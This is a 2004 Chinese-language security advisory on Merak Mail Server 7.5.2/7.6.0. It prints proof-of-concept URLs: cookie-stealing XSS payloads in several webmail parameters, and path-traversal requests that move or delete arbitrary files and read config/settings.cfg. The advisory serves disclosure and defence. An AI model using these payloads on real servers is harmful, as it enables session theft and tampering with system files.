安全研究
安全漏洞
Merak Mail Server远程验证用户移动删除和重命令文件等多个漏洞
发布日期:2004-11-05
更新日期:2004-11-08
受影响系统:
Merak Mail Server, Inc MERAK Mail Server 7.6.0描述:
Merak Mail Server, Inc MERAK Mail Server 7.5.2
Merak Mail Server是一款功能强大的邮件服务程序,包括WEB邮件服务系统。
Merak Mail Server不正确处理用户提交的URL输入,远程攻击者可以利用这些漏洞删除,移动,重命令系统文件及获得目标用户敏感信息。
问题一是多个脚本对用户提交给参数的数据缺少充分过滤,提交包含HTML代码的数据,诱使目标用户处理,可导致敏感信息泄露:
http://[target]:32000/mail/send.html?id=[sessionid]&redirectfile="><script>alert(document.cookie)</script>
http://[target]:320 00/mail/send.html?id=[sessionid]&Old_Folder="><script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&Old_Message="><s cript>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&xwritesentcopy="><script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&returnreceipt="><script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessioni d]&forwardfile="><script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&writepriority="><script>alert(document.coo kie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]©folder="><script>alert(document.cookie)</script>
http://[target]:32000/mail/send .html?id=[sessionid]&messageid="><script>alert(document.cookie)</script>
http://[target]:32000/mail/attachment.html?id=[sessionid]&attachmentpage_text_error= <script>alert(document.cookie)</script>
http://[target]:32000/mail/attachment.html?id=[sessionid]&attachmentpage_text_title=</title><script>alert(docum ent.cookie)</
http://[target]:32000/mail/folderitem.html?id=[sessionid]&folderold="><script>alert(document.cookie)</script>
问题二是验证用户可调用'viewaction.html' 在系统上建立任意目录或删除任意文件或移动任意文件:
http://[target]:32000/mail/viewaction.html?id=[sessionid]&folder=../../../../../../../[arbitary directory]&Move_x=1&originalfolder=blabla
http://[target]:32000/mail/viewaction.html?id=[sessionid]&messageid=...//...//...//...//…//…//…//winnt/system32/cmd.exe&
http://[target]:32000/mail/viewaction.html?id=[session id]&messageid=...//...//...//...//config/settings.cfg&Move_x=1&originalfolder=blabla&m
另外也可以调用folders.html文件查看目标系统上的任意文件和目录:
http://[target]:32000/mail/folders.html?id=[sessionid]& folderold=blabla/...//...//...//...//config/settings.cfg&folder=blabla/...//...//...//...//cm
<*来源:ShineShadow (ss_contacts@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109968824504035&w=2
*>
建议:
厂商补丁:
Merak Mail Server, Inc
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.merakmailserver.com/
浏览次数:3767
严重程度:0(网友投票)
绿盟科技给您安全的保障